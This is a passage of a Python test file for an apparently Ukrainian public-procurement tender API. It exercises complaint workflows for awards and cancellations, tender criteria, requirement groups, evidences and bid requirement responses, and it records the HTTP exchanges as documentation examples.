self.assertEqual(response.status, '200 OK')
self.app.authorization = ('Basic', ('broker', ''))
with open(TARGET_DIR + 'complaints/award-complaint-resolved.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/awards/{}/complaints/{}?acc_token={}'.format(
self.tender_id, award_id, complaint1_id, owner_token),
{'data': {
"tendererAction": "Умови виправлено, вибір переможня буде розгянуто повторно",
"status": "resolved"
}})
self.assertEqual(response.status, '200 OK')
if RELEASE_2020_04_19 > get_now():
with open(TARGET_DIR + 'complaints/award-complaint-accepted-stopping.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/awards/{}/complaints/{}?acc_token={}'.format(
self.tender_id, award_id, complaint4_id, complaint4_token),
{'data': {
"cancellationReason": "Тендер скасовується замовником",
"status": "stopping",
}},
status=200,
)
self.assertEqual(response.status, '200 OK')
self.app.authorization = ('Basic', ('reviewer', ''))
with open(TARGET_DIR + 'complaints/award-complaint-stopping-stopped.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/awards/{}/complaints/{}'.format(self.tender_id, award_id, complaint4_id),
{'data': {
"decision": "Тендер скасовується замовником",
"status": "stopped",
"rejectReason": "tenderCancelled"
}})
self.assertEqual(response.status, '200 OK')
else:
with open(TARGET_DIR + 'complaints/award-complaint-accepted-stopping-2020-04-19.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/awards/{}/complaints/{}?acc_token={}'.format(
self.tender_id, award_id, complaint4_id, complaint4_token),
{'data': {
"cancellationReason": "Тендер скасовується замовником",
"status": "stopping",
}},
status=403,
)
self.assertEqual(response.status, '403 Forbidden')
self.app.authorization = ('Basic', ('reviewer', ''))
response = self.app.patch_json(
'/tenders/{}/awards/{}/complaints/{}?acc_token={}'.format(
self.tender_id, award_id, complaint4_id, complaint4_token),
{'data': {
"status": "declined",
"rejectReason": "tenderCancelled",
}})
self.assertEqual(response.status, '200 OK')
self.app.authorization = ('Basic', ('broker', ''))
with open(TARGET_DIR + 'complaints/award-complaint-satisfied-resolving.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/awards/{}?acc_token={}'.format(self.tender_id, award_id, owner_token),
{'data': {
"status": "cancelled"
}})
self.assertEqual(response.status, '200 OK')
new_award_id = response.headers['Location'][-32:]
award_id = new_award_id
complaint_url = "/tenders/{}/awards/{}/complaints".format(self.tender_id, award_id)
self.app.patch_json(
'/tenders/{}/awards/{}?acc_token={}'.format(self.tender_id, award_id, owner_token),
{"data": {"status": "active"}})
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'complaints/award-complaint-submit.http', 'w') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/awards/{}/complaints?acc_token={}'.format(
self.tender_id, award_id, bid_token),
{'data': complaint})
self.assertEqual(response.status, '201 Created')
if get_now() < RELEASE_2020_04_19:
# before RELEASE_2020_04_19 from pending to mistaken transition was available by reviewer
self.app.authorization = ('Basic', ('broker', ''))
complaint9_id, complaint9_token = complaint_create_pending(self, complaint_url, complaint_data, bid_token)
with open(TARGET_DIR + 'complaints/award-complaint-mistaken.http', 'w') as self.app.file_obj:
self.app.authorization = ('Basic', ('reviewer', ''))
response = self.app.patch_json(
'/tenders/{}/awards/{}/complaints/{}?acc_token={}'.format(
self.tender_id,
award_id,
complaint9_id,
complaint9_token
),
{'data': {"status": "mistaken"}},
)
self.assertEqual(response.status, '200 OK')
else:
# since RELEASE_2020_04_19 from draft to mistaken transition was available by complainant
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.post_json(
'/tenders/{}/awards/{}/complaints?acc_token={}'.format(
self.tender_id, award_id, bid_token),
{'data': complaint})
self.assertEqual(response.status, '201 Created')
complaint9_id = response.json['data']['id']
complaint9_token = response.json['access']['token']
with open(TARGET_DIR + 'complaints/award-complaint-mistaken-2020-04-19.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/awards/{}/complaints/{}?acc_token={}'.format(
self.tender_id,
award_id,
complaint9_id,
complaint9_token),
{'data': {"status": "mistaken"}},
)
self.assertEqual(response.status, '200 OK')
def test_cancellation_complaints(self):
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.post_json(
'/tenders?opt_pretty=1',
{'data': test_tender_data})
self.assertEqual(response.status, '201 Created')
tender = response.json['data']
owner_token = response.json['access']['token']
self.tender_id = tender['id']
self.set_status("active.tendering")
# Cancellation turn to complaint_period
response = self.app.post_json(
'/tenders/{}/cancellations?acc_token={}'.format(
self.tender_id, owner_token),
{'data': {'reason': 'cancellation reason', 'reasonType': 'noDemand'}})
cancellation_id = response.json['data']['id']
self.assertEqual(response.status, '201 Created')
response = self.app.post_json(
'/tenders/{}/cancellations/{}/documents?acc_token={}'.format(
self.tender_id, cancellation_id, owner_token),
{"data": {
"title": "Notice.pdf",
"url": self.generate_docservice_url(),
"hash": "md5:" + "0" * 32,
"format": "application/pdf",
}})
self.assertEqual(response.status, '201 Created')
response = self.app.patch_json(
'/tenders/{}/cancellations/{}?acc_token={}'.format(
self.tender_id, cancellation_id, owner_token),
{'data': {"status": "pending"}})
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'complaints/cancellation-complaint-submission.http', 'w') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/cancellations/{}/complaints'.format(
self.tender_id, cancellation_id),
{'data': complaint})
self.assertEqual(response.status, '201 Created')
complaint1_token = response.json['access']['token']
complaint1_id = response.json['data']['id']
with open(TARGET_DIR + 'complaints/cancellation-complaint-submission-upload.http', 'w') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/cancellations/{}/complaints/{}/documents?acc_token={}'.format(
self.tender_id, cancellation_id, complaint1_id, complaint1_token),
{"data": {
"title": "Complaint_Attachment.pdf",
"url": self.generate_docservice_url(),
"hash": "md5:" + "0" * 32,
"format": "application/pdf",
}})
self.assertEqual(response.status, '201 Created')
complaint_data = {'data': complaint.copy()}
complaint_url = "/tenders/{}/cancellations/{}/complaints".format(self.tender_id, cancellation_id)
complaint3_id, complaint3_token = complaint_create_pending(self, complaint_url, complaint_data)
complaint4_id, complaint4_token = complaint_create_pending(self, complaint_url, complaint_data)
with open(TARGET_DIR + 'complaints/cancellation-complaint-complaint.http', 'w') as self.app.file_obj:
if get_now() < RELEASE_2020_04_19:
response = self.app.patch_json(
'/tenders/{}/cancellations/{}/complaints/{}?acc_token={}'.format(
self.tender_id, cancellation_id, complaint1_id, complaint1_token),
{"data": {"status": "pending"}})
else:
with change_auth(self.app, ("Basic", ("bot", ""))):
response = self.app.patch_json(
'/tenders/{}/cancellations/{}/complaints/{}'.format(
self.tender_id, cancellation_id, complaint1_id),
{"data": {"status": "pending"}})
self.assertEqual(response.status, '200 OK')
complaint5_id, complaint5_token = complaint_create_pending(self, complaint_url, complaint_data)
complaint6_id, complaint6_token = complaint_create_pending(self, complaint_url, complaint_data)
self.app.authorization = ('Basic', ('reviewer', ''))
with open(TARGET_DIR + 'complaints/cancellation-complaint-reject.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/cancellations/{}/complaints/{}'.format(
self.tender_id, cancellation_id, complaint4_id),
{'data': {
"status": "invalid",
"rejectReason": "tenderCancelled",
"rejectReasonDescription": "reject reason description",
}})
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'complaints/cancellation-complaint-accept.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/cancellations/{}/complaints/{}'.format(
self.tender_id, cancellation_id, complaint1_id),
{'data': {
"status": "accepted",
"reviewDate": get_now().isoformat(),
"reviewPlace": "some",
}})
self.assertEqual(response.status, '200 OK')
response = self.app.patch_json(
'/tenders/{}/cancellations/{}/complaints/{}'.format(
self.tender_id, cancellation_id, complaint3_id),
{'data': {
"status": "accepted",
"reviewDate": get_now().isoformat(),
"reviewPlace": "some",
}})
self.assertEqual(response.status, '200 OK')
response = self.app.patch_json(
'/tenders/{}/cancellations/{}/complaints/{}'.format(
self.tender_id, cancellation_id, complaint5_id),
{'data': {
"status": "accepted",
"reviewDate": get_now().isoformat(),
"reviewPlace": "some",
}})
self.assertEqual(response.status, '200 OK')
response = self.app.patch_json(
'/tenders/{}/cancellations/{}/complaints/{}'.format(
self.tender_id, cancellation_id, complaint6_id),
{'data': {
"status": "accepted",
"reviewDate": get_now().isoformat(),
"reviewPlace": "some",
}})
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'complaints/cancellation-complaint-resolution-upload.http', 'w') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/cancellations/{}/complaints/{}/documents'.format
(self.tender_id, cancellation_id, complaint1_id),
{"data": {
"title": "ComplaintResolution.pdf",
"url": self.generate_docservice_url(),
"hash": "md5:" + "0" * 32,
"format": "application/pdf",
}})
self.assertEqual(response.status, '201 Created')
with open(TARGET_DIR + 'complaints/cancellation-complaint-resolve.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/cancellations/{}/complaints/{}'.format(
self.tender_id, cancellation_id, complaint1_id),
{'data': {
"status": "satisfied"
}})
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'complaints/cancellation-complaint-decline.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/cancellations/{}/complaints/{}'.format(
self.tender_id, cancellation_id, complaint3_id),
{'data': {
"status": "declined"
}})
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'complaints/cancellation-complaint-accepted-stopped.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/cancellations/{}/complaints/{}'.format(
self.tender_id, cancellation_id, complaint5_id),
{'data': {
"decision": "Тендер скасовується замовником",
"status": "stopped",
"rejectReason": "tenderCancelled",
}})
self.assertEqual(response.status, '200 OK')
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.patch_json(
'/tenders/{}/cancellations/{}?acc_token={}'.format(
self.tender_id, cancellation_id, owner_token),
{'data': {'status': 'unsuccessful'}}
)
self.assertEqual(response.status_code, 200)
with open(TARGET_DIR + 'complaints/cancellation-complaint-resolved.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/cancellations/{}/complaints/{}?acc_token={}'.format(
self.tender_id, cancellation_id, complaint1_id, owner_token),
{'data': {
"tendererAction": "Умови виправлено",
"status": "resolved",
}})
self.assertEqual(response.status, '200 OK')
self.app.authorization = ('Basic', ('reviewer', ''))
with open(TARGET_DIR + 'complaints/cancellation-complaint-accepted-stopped.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/cancellations/{}/complaints/{}'.format(
self.tender_id, cancellation_id, complaint6_id),
{'data': {
"decision": "Тендер скасовується замовником",
"status": "stopped",
"rejectReason": "tenderCancelled",
}})
self.assertEqual(response.status, '200 OK')
self.app.authorization = ('Basic', ('broker', ''))
# Create new cancellations
response = self.app.post_json(
'/tenders/{}/cancellations?acc_token={}'.format(
self.tender_id, owner_token),
{'data': {'reason': 'cancellation reason', 'reasonType': 'unFixable'}})
cancellation2_id = response.json['data']['id']
self.assertEqual(response.status, '201 Created')
response = self.app.post_json(
'/tenders/{}/cancellations/{}/documents?acc_token={}'.format(
self.tender_id, cancellation2_id, owner_token),
{"data": {
"title": "Notice.pdf",
"url": self.generate_docservice_url(),
"hash": "md5:" + "0" * 32,
"format": "application/pdf",
}})
self.assertEqual(response.status, '201 Created')
response = self.app.patch_json(
'/tenders/{}/cancellations/{}?acc_token={}'.format(
self.tender_id, cancellation2_id, owner_token),
{'data': {"status": "pending"}})
self.assertEqual(response.status, '200 OK')
response = self.app.post_json(
'/tenders/{}/cancellations/{}/complaints'.format(self.tender_id, cancellation2_id),
{'data': complaint})
self.assertEqual(response.status, '201 Created')
with open(TARGET_DIR + 'complaints/cancellation-complaints-list.http', 'w') as self.app.file_obj:
self.app.authorization = None
response = self.app.get('/tenders/{}/cancellations/{}/complaints'.format(
self.tender_id, cancellation_id))
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'complaints/cancellation-complaint.http', 'w') as self.app.file_obj:
self.app.authorization = None
response = self.app.get('/tenders/{}/cancellations/{}/complaints/{}'.format(
self.tender_id, cancellation_id, complaint1_id))
self.assertEqual(response.status, '200 OK')
def test_tender_criteria_article_17(self):
self.app.authorization = ('Basic', ('broker', ''))
tender_data = deepcopy(test_tender_data)
tender_data.update({"status": "draft"})
response = self.app.post_json(
'/tenders?opt_pretty=1',
{'data': tender_data})
self.assertEqual(response.status, '201 Created')
tender = response.json['data']
owner_token = response.json['access']['token']
self.tender_id = tender['id']
other_criteria = deepcopy(test_criterion_data)
other_criteria["classification"]["id"] = "CRITERION.OTHER"
exclusion_criteria = deepcopy(test_criterion_data)
with open(TARGET_DIR + 'criteria/bulk-create-criteria.http', 'wb') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/criteria?acc_token={}'.format(self.tender_id, owner_token),
{'data': [other_criteria]},
)
self.assertEqual(response.status, '201 Created')
criteria_1 = response.json['data'][0]
criteria_id_1 = criteria_1['id']
# Try to update tender from `draft` to `active.tendering` without criteria
with open(TARGET_DIR + 'criteria/update-tender-status-without-criteria.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}?acc_token={}'.format(self.tender_id, owner_token),
{"data": {"status": "active.tendering"}},
status=403,
)
self.assertEqual(response.status, '403 Forbidden')
with open(TARGET_DIR + 'criteria/bulk-create-exclusion-criteria.http', 'wb') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/criteria?acc_token={}'.format(self.tender_id, owner_token),
{'data': [exclusion_criteria]},
)
self.assertEqual(response.status, '201 Created')
criteria_2 = response.json['data'][0]
criteria_id_2 = criteria_2['id']
with open(TARGET_DIR + 'criteria/patch-criteria.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/criteria/{}?acc_token={}'.format(
self.tender_id, criteria_id_1, owner_token),
{'data': {'title': 'Updated title'}},
)
self.assertEqual(response.status, '200 OK')
# Try to patch exclusion criteria
with open(TARGET_DIR + 'criteria/patch-exclusion-criteria.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/criteria/{}?acc_token={}'.format(
self.tender_id, criteria_id_2, owner_token),
{'data': {'title': 'Updated title'}},
status=403,
)
self.assertEqual(response.status, '403 Forbidden')
# Requirement groups operation
rg_id_1 = criteria_1["requirementGroups"][0]["id"]
rg_id_2 = criteria_2["requirementGroups"][0]["id"]
test_rg_data = deepcopy(test_requirement_group_data)
with open(TARGET_DIR + 'criteria/add-criteria-requirement-group.http', 'wb') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/criteria/{}/requirement_groups?acc_token={}'.format(
self.tender_id, criteria_id_1, owner_token),
{'data': test_rg_data},
)
self.assertEqual(response.status, '201 Created')
# Try to add requirement group to exclusion criteria
with open(TARGET_DIR + 'criteria/add-exclusion-criteria-requirement-group.http', 'wb') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/criteria/{}/requirement_groups?acc_token={}'.format(
self.tender_id, criteria_id_2, owner_token),
{'data': test_rg_data},
status=403,
)
self.assertEqual(response.status, '403 Forbidden')
with open(TARGET_DIR + 'criteria/patch-criteria-requirement-group.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/criteria/{}/requirement_groups/{}?acc_token={}'.format(
self.tender_id, criteria_id_1, rg_id_1, owner_token),
{'data': {'description': 'Updated description'}},
)
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/patch-exclusion-criteria-requirement-group.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/criteria/{}/requirement_groups/{}?acc_token={}'.format(
self.tender_id, criteria_id_2, rg_id_2, owner_token),
{'data': {'title': 'Updated title'}},
status=403,
)
self.assertEqual(response.status, '403 Forbidden')
with open(TARGET_DIR + 'criteria/criteria-requirement-group-list.http', 'wb') as self.app.file_obj:
response = self.app.get(
'/tenders/{}/criteria/{}/requirement_groups'.format(self.tender_id, criteria_id_1),
)
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/criteria-requirement-group.http', 'wb') as self.app.file_obj:
response = self.app.get(
'/tenders/{}/criteria/{}/requirement_groups/{}'.format(self.tender_id, criteria_id_1, rg_id_1),
)
self.assertEqual(response.status, '200 OK')
# Requirements operation
requirement_id_1 = criteria_1["requirementGroups"][0]["requirements"][0]["id"]
requirement_id_2 = criteria_2["requirementGroups"][0]["requirements"][0]["id"]
with open(TARGET_DIR + 'criteria/add-criteria-requirement.http', 'wb') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/criteria/{}/requirement_groups/{}/requirements?acc_token={}'.format(
self.tender_id, criteria_id_1, rg_id_1, owner_token),
{'data': test_requirement_data},
)
self.assertEqual(response.status, '201 Created')
with open(TARGET_DIR + 'criteria/add-exclusion-criteria-requirement.http', 'wb') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/criteria/{}/requirement_groups/{}/requirements?acc_token={}'.format(
self.tender_id, criteria_id_2, rg_id_2, owner_token),
{'data': test_requirement_data},
status=403
)
self.assertEqual(response.status, '403 Forbidden')
test_evidence_data = deepcopy(test_eligible_evidence_data)
with open(TARGET_DIR + 'criteria/patch-criteria-requirement.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/criteria/{}/requirement_groups/{}/requirements/{}?acc_token={}'.format(
self.tender_id, criteria_id_1, rg_id_1, requirement_id_1, owner_token),
{'data': {
'title': 'Updated title',
'eligibleEvidences': [test_evidence_data]
}},
)
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/patch-exclusion-criteria-requirement.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/criteria/{}/requirement_groups/{}/requirements/{}?acc_token={}'.format(
self.tender_id, criteria_id_2, rg_id_2, requirement_id_2, owner_token),
{'data': {
'title': 'Updated title',
'eligibleEvidences': [
test_evidence_data,
]
}},
)
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/criteria-requirement-list.http', 'wb') as self.app.file_obj:
response = self.app.get(
'/tenders/{}/criteria/{}/requirement_groups/{}/requirements'.format(
self.tender_id, criteria_id_1, rg_id_1),
)
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/criteria-requirement.http', 'wb') as self.app.file_obj:
response = self.app.get(
'/tenders/{}/criteria/{}/requirement_groups/{}/requirements/{}'.format(
self.tender_id, criteria_id_1, rg_id_1, requirement_id_1),
)
self.assertEqual(response.status, '200 OK')
# Eligible evidence operation
test_evidence_data_1 = deepcopy(test_evidence_data)
test_evidence_data_2 = deepcopy(test_evidence_data)
test_evidence_data_2["type"] = "statement"
with open(TARGET_DIR + 'criteria/bulk-update-requirement-evidence.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/criteria/{}/requirement_groups/{}/requirements/{}?acc_token={}'.format(
self.tender_id, criteria_id_1, rg_id_1, requirement_id_1, owner_token),
{"data": {"eligibleEvidences": [test_evidence_data_1, test_evidence_data_2]}},
)
self.assertEqual(response.status, '200 OK')
evidence = response.json["data"]["eligibleEvidences"][1]
with open(TARGET_DIR + 'criteria/bulk-delete-requirement-evidence.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/criteria/{}/requirement_groups/{}/requirements/{}?acc_token={}'.format(
self.tender_id, criteria_id_1, rg_id_1, requirement_id_1, owner_token),
{"data": {"eligibleEvidences": [evidence]}},
)
self.assertEqual(response.status, '200 OK')
self.app.patch_json(
'/tenders/{}/criteria/{}/requirement_groups/{}/requirements/{}?acc_token={}'.format(
self.tender_id, criteria_id_1, rg_id_1, requirement_id_1, owner_token),
{"data": {"eligibleEvidences": [test_evidence_data_1, test_evidence_data_2]}},
)
with open(TARGET_DIR + 'criteria/add-requirement-evidence.http', 'wb') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/criteria/{}/requirement_groups/{}/requirements/{}/evidences?acc_token={}'.format(
self.tender_id, criteria_id_1, rg_id_1, requirement_id_1, owner_token),
{'data': test_evidence_data},
)
self.assertEqual(response.status, '201 Created')
evidence_id = response.json['data']['id']
with open(TARGET_DIR + 'criteria/patch-requirement-evidence.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/criteria/{}/requirement_groups/{}/requirements/{}/evidences/{}?acc_token={}'.format(
self.tender_id, criteria_id_1, rg_id_1, requirement_id_1, evidence_id, owner_token),
{'data': {'title_en': 'Documented approve'}},
)
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/requirement-evidences-list.http', 'wb') as self.app.file_obj:
response = self.app.get(
'/tenders/{}/criteria/{}/requirement_groups/{}/requirements/{}/evidences'.format(
self.tender_id, criteria_id_1, rg_id_1, requirement_id_1),
)
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/requirement-evidence.http', 'wb') as self.app.file_obj:
response = self.app.get(
'/tenders/{}/criteria/{}/requirement_groups/{}/requirements/{}/evidences/{}'.format(
self.tender_id, criteria_id_1, rg_id_1, requirement_id_1, evidence_id),
)
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/delete-requirement-evidence.http', 'wb') as self.app.file_obj:
response = self.app.delete(
'/tenders/{}/criteria/{}/requirement_groups/{}/requirements/{}/evidences/{}?acc_token={}'.format(
self.tender_id, criteria_id_1, rg_id_1, requirement_id_1, evidence_id, owner_token),
)
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/criteria-list.http', 'wb') as self.app.file_obj:
response = self.app.get('/tenders/{}/criteria'.format(self.tender_id))
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/criteria.http', 'wb') as self.app.file_obj:
response = self.app.get('/tenders/{}/criteria/{}'.format(self.tender_id, criteria_id_1))
self.assertEqual(response.status, '200 OK')
self.set_status("active.tendering")
with open(TARGET_DIR + 'criteria/put-exclusion-criteria-requirement.http', 'wb') as self.app.file_obj:
response = self.app.put_json(
'/tenders/{}/criteria/{}/requirement_groups/{}/requirements/{}?acc_token={}'.format(
self.tender_id, criteria_id_2, rg_id_2, requirement_id_2, owner_token),
{'data': {
'title': 'Updated title',
'eligibleEvidences': [
test_evidence_data,
]
}},
)
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/requirement-put-add-evidence.http', 'wb') as self.app.file_obj:
test_evidence_data_new = deepcopy(test_evidence_data)
test_evidence_data_new["title"] = "new, added by requirement PUT"
response = self.app.put_json(
'/tenders/{}/criteria/{}/requirement_groups/{}/requirements/{}?acc_token={}'.format(
self.tender_id, criteria_id_2, rg_id_2, requirement_id_2, owner_token),
{'data': {
'eligibleEvidences': [
test_evidence_data,
test_evidence_data_new
]
}},
)
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/requirement-put-update-evidence.http', 'wb') as self.app.file_obj:
test_evidence_data_new["title"] = "changed_new, changed by requirement PUT"
response = self.app.put_json(
'/tenders/{}/criteria/{}/requirement_groups/{}/requirements/{}?acc_token={}'.format(
self.tender_id, criteria_id_2, rg_id_2, requirement_id_2, owner_token),
{'data': {
'eligibleEvidences': [
test_evidence_data,
test_evidence_data_new
]
}},
)
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/requirement-put-delete-evidence.http', 'wb') as self.app.file_obj:
response = self.app.put_json(
'/tenders/{}/criteria/{}/requirement_groups/{}/requirements/{}?acc_token={}'.format(
self.tender_id, criteria_id_2, rg_id_2, requirement_id_2, owner_token),
{'data': {
'eligibleEvidences': []
}},
)
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/criteria-requirement-cancellation.http', 'wb') as self.app.file_obj:
response = self.app.put_json(
'/tenders/{}/criteria/{}/requirement_groups/{}/requirements/{}?acc_token={}'.format(
self.tender_id, criteria_id_2, rg_id_2, requirement_id_2, owner_token),
{'data': {
'status': 'cancelled'
}},
)
self.assertEqual(response.status, '200 OK')
def test_bid_requirement_response(self):
tender_data = deepcopy(test_tender_data)
response = self.app.post_json(
'/tenders?opt_pretty=1',
{'data': tender_data})
self.assertEqual(response.status, '201 Created')
tender = response.json['data']
owner_token = response.json['access']['token']
self.tender_id = tender['id']
self.set_status("active.tendering")
criteria_data = deepcopy(test_criteria[:2])
criteria_data[1]["requirementGroups"][0]["requirements"].append({
"dataType": "boolean",
"expectedValue": "true",
"title": "Additional requirement"
})
response = self.app.post_json(
'/tenders/{}/criteria?acc_token={}'.format(self.tender_id, owner_token),
{'data': criteria_data},
)
self.assertEqual(response.status, '201 Created')
criteria = response.json["data"]
bid_data = deepcopy(bid)
bid_data["status"] = "draft"
response = self.app.post_json(
'/tenders/{}/bids'.format(self.tender_id),
{'data': bid})
bid_id = response.json['data']['id']
bid_token = response.json['access']['token']
self.assertEqual(response.status, '201 Created')
response = self.app.post_json(
"/tenders/{}/bids/{}/documents?acc_token={}".format(
self.tender_id, bid_id, bid_token),
{"data": {
"title": "name.doc",
"url": self.generate_docservice_url(),
"hash": "md5:" + "0" * 32,
"format": "application/msword",
}}
)
self.assertEqual(response.status, "201 Created")
doc_id = response.json["data"]["id"]
evidence_data = {
"title": "Requirement response",
"relatedDocument": {
"id": doc_id,
"title": "name.doc",
},
"type": "document",
}
requirement_1_1 = criteria[0]["requirementGroups"][0]["requirements"][0]
requirement_1_2 = criteria[0]["requirementGroups"][1]["requirements"][0]
requirement_2_1 = criteria[1]["requirementGroups"][0]["requirements"][0]
requirement_2_2 = criteria[1]["requirementGroups"][0]["requirements"][1]
rr_mock = {
"title": "Requirement response",
"description": "some description",
"requirement": {
"id": requirement_1_1["id"],
"title": requirement_1_1["title"],
},
"evidences": [
evidence_data,
],
"value": "True",
}
rr_1_1 = deepcopy(rr_mock)
rr_1_2 = deepcopy(rr_mock)
rr_1_2["requirement"] = {
"id": requirement_1_2["id"],
"title": requirement_1_2["title"],
}
rr_2_1 = deepcopy(rr_mock)
rr_2_1["title"] = "Requirement response 2"
rr_2_1["requirement"] = {
"id": requirement_2_1["id"],
"title": requirement_2_1["title"],
}
with open(TARGET_DIR + 'criteria/requirement-response-basic-data-1.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/bids/{}?acc_token={}'.format(
self.tender_id, bid_id, bid_token),
{'data': {'requirementResponses': [rr_1_1]}},
)
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/bid-activation-not-all-criteria.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/bids/{}?acc_token={}'.format(
self.tender_id, bid_id, bid_token),
{'data': {'status': 'active'}},
status=422
)
self.assertEqual(response.status, '422 Unprocessable Entity')
with open(TARGET_DIR + 'criteria/requirement-response-basic-data-2.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/bids/{}?acc_token={}'.format(
self.tender_id, bid_id, bid_token),
{'data': {'requirementResponses': [rr_1_1, rr_1_2, rr_2_1]}},
)
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/bid-activation-answered-on-two-groups.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/bids/{}?acc_token={}'.format(
self.tender_id, bid_id, bid_token),
{'data': {'status': 'active'}},
status=422
)
self.assertEqual(response.status, '422 Unprocessable Entity')
with open(TARGET_DIR + 'criteria/requirement-response-basic-data-3.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/bids/{}?acc_token={}'.format(
self.tender_id, bid_id, bid_token),
{'data': {'requirementResponses': [rr_1_1, rr_2_1]}},
)
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/bid-activation-not-all-requirements.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/bids/{}?acc_token={}'.format(
self.tender_id, bid_id, bid_token),
{'data': {'status': 'active'}},
status=422
)
self.assertEqual(response.status, '422 Unprocessable Entity')
with open(TARGET_DIR + 'criteria/add-requirement-response-from-bid.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/bids/{}?acc_token={}'.format(
self.tender_id, bid_id, bid_token),
{'data': {'requirementResponses': [rr_1_1, rr_2_1]}},
)
self.assertEqual(response.status, '200 OK')
rr_1_1["title"] = "Requirement response 1"
with open(TARGET_DIR + 'criteria/patch-requirement-response-from-bid.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/bids/{}?acc_token={}'.format(
self.tender_id, bid_id, bid_token),
{'data': {'requirementResponses': [rr_1_1, rr_2_1]}},
)
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/delete-requirement-response-from-bid.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/bids/{}?acc_token={}'.format(
self.tender_id, bid_id, bid_token),
{'data': {'requirementResponses': []}},
)
self.assertEqual(response.status, '200 OK')
test_rr_data = [deepcopy(rr_mock), ]
with open(TARGET_DIR + 'criteria/create-requirement-response.http', 'wb') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/bids/{}/requirement_responses?acc_token={}'.format(
self.tender_id, bid_id, bid_token),
{'data': test_rr_data},
)
self.assertEqual(response.status, '201 Created')
rr_id = response.json["data"][0]["id"]
with open(TARGET_DIR + 'criteria/update-requirement-response.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/bids/{}/requirement_responses/{}?acc_token={}'.format(
self.tender_id, bid_id, rr_id, bid_token),
{'data': {'title': 'Updated title'}},
)
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/create-requirement-response-evidence.http', 'wb') as self.app.file_obj:
response = self.app.post_json(
